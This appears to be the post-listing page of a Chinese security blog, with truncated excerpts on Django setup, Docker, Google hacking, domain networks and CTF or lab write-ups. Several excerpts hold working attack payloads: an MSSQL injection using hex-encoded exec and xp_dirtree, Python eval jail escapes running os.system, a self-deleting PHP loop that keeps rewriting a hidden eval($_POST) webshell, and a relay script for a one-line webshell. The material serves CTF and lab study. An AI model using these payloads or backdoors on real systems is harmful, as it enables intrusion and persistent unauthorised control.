online_crt
online_crtapp.py
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293import datetimeimport jsonimport osimport socketimport uuidfrom cryptography import x509from cryptography.hazmat.backends import default_backendfrom cryptography.hazmat.primitives import hashes, serializationfrom cryptography.hazmat.primitives.asymmetric import rsafrom cryptography.x509.oid import NameOID ...
Django
环境配置安装,创建django项目
默认文件1234567 __init__.py asgi.py 接受网络请求,异步请求,无需改动 settings.py 项目配置文件 urls.py 路由设置文件 wsgi.py 接受网络信息文件,头部请求,无需改动templates manage.py 核心文件,负责项目管理,启动,创建app,数据库管理
app创建app负责实现项目功能点
在终端输入
1python manage.py startapp app01
123456apps.py 无需改动tests.py 单元测试,无需改动migrations/__init__.py 数据库字段变更,无需改动admin.py 后台模块,无需改动views.py 重要内容,与函数有关models.py 重要内容,数据库操作
启用django创建完毕app还需要在settings.py进行注册
然后编写url和视图函数对应关系,在urls.py
views.py中
启动程序,成功访问
模板与静态文件返回字符串可以直接使用httpresponse,但如果想要返回一个htm ...
MiniL CTF
ezsql过滤了空格,可以使用空白字符绕过
/**/
%0a %01 %02 %0E %0f
+
这里%0a,+和/**/都不可以,而且只有隐式转化才会出现报错,还过滤了$ % & * ' " < >
'和"被过滤,但是;可以用,用十六进制编码绕过
1id=1;declare%02@s%02varchar(2000)%02set%02@s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29%02exec(@s)
插入文件数据123456789101112//创建表格CREATE TABLE tmp (dir varchar(8000),num int,num1 int);//列目录insert into tmp(dir,num,num1) execute master..xp_dirtree '/',1,1insert into tmp(dir,num,num1) exec xp_dirtree '/',1,1 ...
AntCTFXD^3CTF
123exp = '__import__("os").system("id")'print(f"eval(bytes([[j][0]for(i)in[range({len(exp)})][0]for(j)in[range(256)][0]if["+"]]or[".join([f"i]in[[{i}]]and[j]in[[{ord(j)}" for i, j in enumerate(exp)]) + "]]]))")
如果if过滤
1CMD = [eval][eval(list(dict(b_o_o_l=1))[0][::2])(eval(list(dict(e_x_e_c=1))[0][::2])(eval(list(dict(b_y_t_e_s=1))[0][::2])([eval(list(dict(o_r_d=1))[0][::2])(j)for(i)in(list(eval( ...
红日二
环境配置首先把我们的NAT模式改成靶场的网段
然后配置一下
web靶机,这个需要先还原V1.3快照才能用默认密码登录
之后进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin
管理员:Administrator/1qaz@WSX
以管理员身份开启weblogic服务
1netstat -ano | findstr 7001
开启PC,输入用户名密码让360自启动
外网打点搜集ip信息
12345678910111213┌──(root㉿kali)-[/home/kali]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:b6:a8:7e, IPv4: 192.168.111.145Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)192.168.111.1 00:50:56:c0:00:08 VMware, Inc.192. ...
权限维持
web670-web676写一个.shell.php
因为rm -rf *不会删掉开头为.的文件
写入内存马,就算删掉了文件内存马还存在
1234567891011<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php @eval($_POST[1]);?>'; while (1) { file_put_contents($file, $code); usleep(5000); }?>
web677-web678会删掉所有文件但是不会杀掉进程,那就留一个进程延时读取/f*文件
1cmd=system('sleep 9;cat /f*');
web679这里check之后直接404了,但是依然没有杀掉进程
先到/tmp写个index.php,然后在 ...
Docker学习
docekr配置docker换源
123456789#输入命令,创建daemon.json文件vim /etc/docker/daemon.json#在编辑器中输入内容,并保存退出{ "registry-mirrors": ["https://nddt8zfh.mirror.aliyuncs.com"]}#输入命令,重启docker即可systemctl daemon-reloadsystemctl restart docker
docker环境调试
1234567version: '2'services:weblogic:image: vulhub/weblogicports:- "7001:7001"#映射的端口docekr- "8453:8453"
继续
1234apt-get updateapt-get install vim使用docker exec -it e0 /bin/bash命令进入容器,对root/Oracle/Middleware/user_ ...
GET->POST
请求转化由于蚁剑菜刀均是利用POST进行命令执行
只要把POST改为GET请求即可
如下脚本
1234567891011121314151617181920<?phphighlight_file(__FILE__);ini_set('max_execution_time', '100'); // 超时时间$url = 'http://localhost/test/rce.php'; // 一句话地址$pass = '2'; // 密码$data = $_POST['cmd']; // 中转密码echo file_get_contents($url.'?'.$pass.'='.$data);if(isset($_GET['upload'])){ $f = fopen('darkshell.php','r'); // 上传文件 while (!feof($f)) ...
Google Hack
Google Hack1.intext: 关键字、allintext:关键字把网页正文中某个关键字做为搜索条件,然后搜索全世界网页正文中含有这些关键字的网页eg: 搜索网页登陆口,intext:验证码 4800
2.intitle:关键字、allintitle: 关键字把网页标题中某个关键字做为搜索条件,然后搜索全世界网页标题中含有这些关键字的网页eg: intitle:后台登陆
3.cache:关键字搜索含有关键字内容的cacheeg:cache:pku.edu.cn #搜索北京大学服务器中的缓存
4.define:关键字搜索关键字的定义。eg:define:html查找Html的定义
5.filetype:文件名.后缀名搜索特定的文件eg: 搜索信息安全类的论文 “信息安全论文” fiile:doc
6.info:关键字这个语法用于搜索指定站点的一些基本信息eg: info:pku.edu.cn 搜索北京大学网站的一些基本信息
7.inurl:关键字、还可以使用allinurl来精确的定位URL地址搜索含有关键字的URL地址
8.link:关键字。查找与关键字做个链接的URL链接, ...
内网基础
域(Domain)网络中多台计算机通过逻辑的方式组织到一起进行集中管理,这种集中管理的环境称为域
域控制器(Domain Controller DC)每个域中至少有一台域服务器,集中存放整个域的用户帐号和安全数据库,安装了活动目录(AD)的主机称为域控制器,所有的权限身份验证都在域控制器上进行
域环境 单域:一般至少两台域服务器,一台作为DC,一台作为备份DC
父域和子域:出于管理需求,需要在网络中划分多个域,第一个域称为父域,各分部的域称为子域,不同的域之间,信息交互的条目会大大减少,且可以压缩后进行交互,节约带宽,并且域管可以针对各个域,设置不同的安全策略,灵活管理
域树: 域管理器只能管理本域,如果需要管理其他域,则需要建立信任关系,域树则是指多个域通过建立信任关系组成的集合,同理,多个域树通过建立信任关系组成的集合则称为域林
域名服务器(DNS): 用于实现域名和与之对应的IP地址之间相互转换,因为域中的计算机是使用DNS来定位域控和其他服务器的,所以域的名字就是DNS域的名字(DNS和DC一般在同一台机器上)
活动目录(Active Directory,AD) ...